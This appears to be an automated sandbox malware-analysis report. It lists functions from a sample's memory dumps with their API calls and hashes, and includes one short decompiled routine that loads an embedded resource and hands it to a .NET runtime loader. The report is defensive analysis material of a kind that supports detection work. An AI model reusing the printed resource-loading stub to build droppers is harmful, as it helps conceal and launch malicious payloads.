            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








            0x0040149f
            0x004014a5
            0x004014a9
            0x004014ec
            0x004014ee
            0x004014ee
            0x004014b7
            0x004014bb
            0x004014c7
            0x004014cd
            0x004014d3
            0x004014d8
            0x004014e0
            0x004014e0
            0x004014d8
            0x004014e6
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DB6C0, Relevance: 6.1, APIs: 4, Instructions: 122threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 022DB730
            • GetCurrentThread.KERNEL32 ref: 022DB76D
            • GetCurrentProcess.KERNEL32 ref: 022DB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022DB803
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: b804133437e3ee91a49ce4971991fe4b6aa8c05ee1e107c2e50808cbbabd5161
            • Instruction ID: d9e9153895861c9584181485b11b92f2390cf5840782f6baa0618ff2c5706d2a
            • Opcode Fuzzy Hash: b804133437e3ee91a49ce4971991fe4b6aa8c05ee1e107c2e50808cbbabd5161
            • Instruction Fuzzy Hash: 6A5133B4E042498FEB14CFA9D698BDEBBF1BB48308F24856AE419A7360D7345844CF65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 022DB730
            • GetCurrentThread.KERNEL32 ref: 022DB76D
            • GetCurrentProcess.KERNEL32 ref: 022DB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022DB803
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 15c848786a8bb54573ef388079395224fd00bd2808c0ab891e9e71aed72c9f80
            • Instruction ID: a47d9d335ddf540f481bb321163cf521710c0e41a09e6712f950782f15b600c4
            • Opcode Fuzzy Hash: 15c848786a8bb54573ef388079395224fd00bd2808c0ab891e9e71aed72c9f80
            • Instruction Fuzzy Hash: E55132B4E002498FEB14CFA9D598BDEFBF5BB88308F24856AE419A7360D7345844CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 43149eb2c471f95c7caded1428d3148077e557be51c4f0490485b0a47d8bde8a
            • Instruction ID: dfe3a961d745ef0ca9ee526ddc28d9671133320e1b48e14bd2ec0940e62d1a99
            • Opcode Fuzzy Hash: 43149eb2c471f95c7caded1428d3148077e557be51c4f0490485b0a47d8bde8a
            • Instruction Fuzzy Hash: A1224F78E04306CFCB54DB98E588ABEFBB2BB89310F648555E91267355CB34A881CB71
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022D93E8, Relevance: 1.7, APIs: 1, Instructions: 192COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022D962E
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 940af3ffbb211407d7586e8c2066e0c11a2c6028cf98fdb12182d7e3c979fd00
            • Instruction ID: ac4b8cfd0e30221326f3d5a821ce40c1b048bdbbd0d959a251dbfb8118771229
            • Opcode Fuzzy Hash: 940af3ffbb211407d7586e8c2066e0c11a2c6028cf98fdb12182d7e3c979fd00
            • Instruction Fuzzy Hash: 0C7137B4A10B058FDB24DF69D05079AB7F1BF88304F008A2DE58ADBA44DB74E845CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DFBEE, Relevance: 1.6, APIs: 1, Instructions: 114COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022DFD0A
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 009c6c97f2f0cab49137789846652a9a7c6ec8bc560bf22c3c30ca8475574e62
            • Instruction ID: 419ce94d81ca43b56e1396381c8a9bfa6f7cafd7dc67c0266bda05b129cf3aa1
            • Opcode Fuzzy Hash: 009c6c97f2f0cab49137789846652a9a7c6ec8bc560bf22c3c30ca8475574e62
            • Instruction Fuzzy Hash: 3751DDB1D10349DFDB14CFE9D980ADEBBB1BF48304F24862AE819AB214D7749885CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022DFD0A
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: a9c542a7dca61cbf246c2a94dde2308c73acffdfde1fc5013b0695509a1d2c99
            • Instruction ID: b5bc0bff56a56ff7c837f8ad20b060028c87a0310e6cbcf0e0b49e82ef337134
            • Opcode Fuzzy Hash: a9c542a7dca61cbf246c2a94dde2308c73acffdfde1fc5013b0695509a1d2c99
            • Instruction Fuzzy Hash: AA41EFB1D10349DFDB14CFE9C980ADEBBB5BF48304F24822AE819AB214D7749845CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D45F5, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050D46B1
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 3859fdbd0fbb5bcc96f565327d18bb01bd56fa8395316883c43cab48ad661b5b
            • Instruction ID: 1b66262cac507e5c8e295b3cbdc3fa5c3fdfccc6ffdfdd84a9f1ad75ab4ea48e
            • Opcode Fuzzy Hash: 3859fdbd0fbb5bcc96f565327d18bb01bd56fa8395316883c43cab48ad661b5b
            • Instruction Fuzzy Hash: E0411FB1C04758CFDB20CFA9D884BDEBBB1BF59304F24806AD409AB251D7B56946CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050D46B1
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 424b1d947505ad5e9946f66e50257fd0ab6119f1c0b24e7b123d579e38b64647
            • Instruction ID: 3e0b90f340ead9830c8c4edf16ae03b9adf73339e78761aed8e070097e86d36f
            • Opcode Fuzzy Hash: 424b1d947505ad5e9946f66e50257fd0ab6119f1c0b24e7b123d579e38b64647
            • Instruction Fuzzy Hash: 244101B0C04758CBDB24DFA9D884BDEFBB5BF89304F20806AD409AB251D7B56945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
            Download Yara Rule
            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 050D2531
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: 025f59c1b5dcf068a595078bc52ff3075d9230adf29e7a61aa63db979f30aa89
            • Instruction ID: e16591691a35ba973cec1ac06941195f8239f21b4f36d3476b3e0b87cdea5a2e
            • Opcode Fuzzy Hash: 025f59c1b5dcf068a595078bc52ff3075d9230adf29e7a61aa63db979f30aa89
            • Instruction Fuzzy Hash: AF41F9B8A003058FDB14CF99D448BAEFBF6FB88314F25C559D519AB325D374A841CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DB889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 050DB957
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 195db2f00505452a3b9f6aa684fcc968f2a6c7f7d6e2090834230195f487d558
            • Instruction ID: 98628c60174fc99956d72be63d3ae7a908edf009052f26f273c0090fb6c0056b
            • Opcode Fuzzy Hash: 195db2f00505452a3b9f6aa684fcc968f2a6c7f7d6e2090834230195f487d558
            • Instruction Fuzzy Hash: 67318B729043899FDB118FA9D840BDEBFF8EF19310F09806AE954AB252C3359851DFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05266270, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05266320
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 7fea69cf0189383655a0e8a2ae2d1b875fcef6c603e1da221a5e33c469011946
            • Instruction ID: 76175d83cbaa866a55cd04fb518a143e94d3df1476bccc84e85c4cd1b50980b3
            • Opcode Fuzzy Hash: 7fea69cf0189383655a0e8a2ae2d1b875fcef6c603e1da221a5e33c469011946
            • Instruction Fuzzy Hash: 2731B8B1900308CFCB10DF98D884BDEBBF4FF58310F14806AE858AB251C335A985CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DBCF8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022DBD87
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 1dc08d326a60123936cbfbeb478d7bd1357448dba5f5263bb84b3c03ba342b1d
            • Instruction ID: 9bc712b18b06a7cac490c1ca8a2b156f2a7b67c0c0370de072528ab3b05a96d1
            • Opcode Fuzzy Hash: 1dc08d326a60123936cbfbeb478d7bd1357448dba5f5263bb84b3c03ba342b1d
            • Instruction Fuzzy Hash: 0821BFB5D002499FDB10CFA9D984BDEBBF4EB48314F14852AE918A7310D378A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022DBD87
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: d81deea3438995c3358a1b7d24e4b8b6a47415c174b0aca2fb594b36ed4308e7
            • Instruction ID: 45b6bbee306344b9b56e9d676dc88a3997bdff2ab866457308f15134823ce742
            • Opcode Fuzzy Hash: d81deea3438995c3358a1b7d24e4b8b6a47415c174b0aca2fb594b36ed4308e7
            • Instruction Fuzzy Hash: 6521C4B59002499FDB10CFAAD884ADEFFF8FB48314F14852AE914A7310D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022D8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022D96A9,00000800,00000000,00000000), ref: 022D98BA
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 337af8b5a1ebe9cf023c1474812cc9ac789b710e4bb8cdd24b5466c24a8729a5
            • Instruction ID: 752badec1790444491ec47e51f1353275d3580bc7a7a686f98ef34a4763a1456
            • Opcode Fuzzy Hash: 337af8b5a1ebe9cf023c1474812cc9ac789b710e4bb8cdd24b5466c24a8729a5
            • Instruction Fuzzy Hash: C51130B6D002499FDB10CF9AC844BDEFBF4EB88714F10842EE919A7600C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 050DB957
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 62ff3404e6b1069a6cc16247fbca5e29c01ab80c0024480421ca58445374f896
            • Instruction ID: 78aaa72baabe99413d80311a6824155d15cd8a77297690460604144bcf42b371
            • Opcode Fuzzy Hash: 62ff3404e6b1069a6cc16247fbca5e29c01ab80c0024480421ca58445374f896
            • Instruction Fuzzy Hash: B41134B58003499FDB10CFAAD844BDEFFF8EB48320F14841AE914A7210C339A954DFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022D9849, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022D96A9,00000800,00000000,00000000), ref: 022D98BA
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 68666be0f161b669f24b7c68fbd33b79e950506352de2c84142ba4a5b76f44ab
            • Instruction ID: a1797319aba9e8baac08c7258499732fba80e20417211c6c7b99b7fbbaf0a761
            • Opcode Fuzzy Hash: 68666be0f161b669f24b7c68fbd33b79e950506352de2c84142ba4a5b76f44ab
            • Instruction Fuzzy Hash: 6911D0B6D002498FDB10CF99D584BDEFBF4AF48314F14852AE819A7600C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022D7EEA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
            Download Yara Rule
            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022D7F5D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: f6554cf951f9163542d664ef772068cff3b0265244fcd0589e4d31635869a0b7
            • Instruction ID: 087833eeef5737ff24a63a5a223b29b56574908ed6b7c977b4b5fed63da3cd3b
            • Opcode Fuzzy Hash: f6554cf951f9163542d664ef772068cff3b0265244fcd0589e4d31635869a0b7
            • Instruction Fuzzy Hash: 2B21CAB0C043848FDB10CFA8E4487EEBFF4AB05304F44846AE584A3642C3789A15CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,022A53E8,00000000,?), ref: 050DE73D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d936a749860856a090a85580ea816e695c907cf8fcf98122f1ea923742343938
            • Instruction ID: 5cb66e823792c90822d0866318bb4da2836bb3f063804f2ec978c495f0ea2230
            • Opcode Fuzzy Hash: d936a749860856a090a85580ea816e695c907cf8fcf98122f1ea923742343938
            • Instruction Fuzzy Hash: D01125B58003499FDB50CF99D885BEEFBF8FB48320F10842AE954A7640D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DE6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,022A53E8,00000000,?), ref: 050DE73D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: f1475a430bfba0f87383e34ecb214b0e9d396629a405a35a5c739cae6aa34866
            • Instruction ID: 7b4fca8596ca9965602a762b8a5a6e3bbbf679ac87b54bef435e97823e648f9b
            • Opcode Fuzzy Hash: f1475a430bfba0f87383e34ecb214b0e9d396629a405a35a5c739cae6aa34866
            • Instruction Fuzzy Hash: 301132B58003099FDB50CF99D885BEEFBF8FB48320F10842AE854A7201D378A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 052662C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05266320
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 0f62764a6ae4fbc5bcb3889a37b383692ca4bdd02ee04eb0422476ed5ced4dac
            • Instruction ID: 39c8972142cb548c04f154a5ce7009b479fa17eef962827d29f1eb6052999275
            • Opcode Fuzzy Hash: 0f62764a6ae4fbc5bcb3889a37b383692ca4bdd02ee04eb0422476ed5ced4dac
            • Instruction Fuzzy Hash: 2D1103B58042498FDB20CF99D484BDEBBF4EF58324F14852AD959A7740D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022D95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022D962E
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 51915d459e09f4f6ab3aa9cd1ca092605edc9492647df46d3c8f74b9eb70cb7a
            • Instruction ID: aaa561c8eba1e2fd610dbe775dafea26d97ec24b6ee11550f1b5aacda74ec1ff
            • Opcode Fuzzy Hash: 51915d459e09f4f6ab3aa9cd1ca092605edc9492647df46d3c8f74b9eb70cb7a
            • Instruction Fuzzy Hash: AC11E0B5D002498FDB10CF9AD844BDEFBF4EB89214F14852AD829B7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 050DBCBD
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: a28d5e2554a6d5f86a82fbabeef6632d9023c888b059386967aafc3e9552eb19
            • Instruction ID: b1ce9dd059debed67293c3ab38064077a71aeae4fca13e67456d6ceddcb76ca2
            • Opcode Fuzzy Hash: a28d5e2554a6d5f86a82fbabeef6632d9023c888b059386967aafc3e9552eb19
            • Instruction Fuzzy Hash: F611B0B59043499FDB10CF99D889BDEFBF8FB48314F10852AE955A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,050D226A,?,00000000,?), ref: 050DC435
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: e05bc56ebd3c820dde6bf6ffef037d7868581579c409f0088203377f4acb1a42
            • Instruction ID: b5a2f984a753704a9abc821145771307cfd3f66d9bbf31f85b1581f94df7cd5b
            • Opcode Fuzzy Hash: e05bc56ebd3c820dde6bf6ffef037d7868581579c409f0088203377f4acb1a42
            • Instruction Fuzzy Hash: A51103B59043499FDB20CF99D884BEEFBF8FB59314F10852AE915A7600C3B4A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050D50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 050DD29D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: e9bde06da63fabdde85400131feaddaa27b19677c1112c3b966fac6f188d183c
            • Instruction ID: 29140a049b4f67b32ceeb1fff607caa343ba9714ca2e2764595564c3d8eb0f2c
            • Opcode Fuzzy Hash: e9bde06da63fabdde85400131feaddaa27b19677c1112c3b966fac6f188d183c
            • Instruction Fuzzy Hash: 8D11C2B59043499FDB10CF99D885BEEFBF8EB58314F10852AE915A7600C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DD238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 050DD29D
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 79151545fd59ec6ed4639c4474dfb7f341b0ea1ebbab466090afe8efd8ab0538
            • Instruction ID: 009effdc36cbd2f026f22bb6fd81ffdfa25c2bdcfb2c3a7ebe1db397950d22d1
            • Opcode Fuzzy Hash: 79151545fd59ec6ed4639c4474dfb7f341b0ea1ebbab466090afe8efd8ab0538
            • Instruction Fuzzy Hash: 7511E0B58003499FEB10CF99D885BEEFBF8FB58320F10851AE814A7600C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 05260438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 61bda13346ef21a4f095410be6609ca42a167982f0c13f4ec6fe9b17ff403840
            • Instruction ID: e7159ab775bbbb5730ab96a06a2161fdd414bdca83e9d276db0e6841fef5f122
            • Opcode Fuzzy Hash: 61bda13346ef21a4f095410be6609ca42a167982f0c13f4ec6fe9b17ff403840
            • Instruction Fuzzy Hash: B111E3B5C046498FDB10CF9AD444BDEFBF4AB48314F14852AD919A7600C378A545CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DC3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,050D226A,?,00000000,?), ref: 050DC435
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: d3ae5bf58f02629be7b9e9b341d2e4b178a41a78c6f0277c890f231c1402b389
            • Instruction ID: c1204dd69c1324c28c72de89986cbce941fe9e0c042fff9b337eb2854befa2f2
            • Opcode Fuzzy Hash: d3ae5bf58f02629be7b9e9b341d2e4b178a41a78c6f0277c890f231c1402b389
            • Instruction Fuzzy Hash: 9711F2B58003499FEB10CF99D885BEEFBF8FB48314F10852AE854A7600C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DFE38, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022DFE9D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 57c5770f446c38cc92bc5e07abe38b57bd11d5ec0452b20b9e49a0d566f4e7f2
            • Instruction ID: 27705a6cdad2f9b1bd3633e6dc648ebe6fd37d99371a950a132c8ebcd7c03a4b
            • Opcode Fuzzy Hash: 57c5770f446c38cc92bc5e07abe38b57bd11d5ec0452b20b9e49a0d566f4e7f2
            • Instruction Fuzzy Hash: 2C11FEB5900249CFDB10CF99D685BDEBBF8EB48324F14855AE919A7701C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022DFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022DFE9D
            Memory Dump Source
            • Source File: 0000000A.00000002.684132601.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 477c69179ec238a2e9e9d8132f8ba8b7f819c3c0115287bbe8755e6a5bb84d67
            • Instruction ID: 4f2a80a0ce0c74a49ec50856915d1d03fd7dda9aecb2c2fd8621e4ac5ac6230d
            • Opcode Fuzzy Hash: 477c69179ec238a2e9e9d8132f8ba8b7f819c3c0115287bbe8755e6a5bb84d67
            • Instruction Fuzzy Hash: EF1112B59002498FDB10CF99D984BDFFBF8EB48324F10851AE819A7701C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

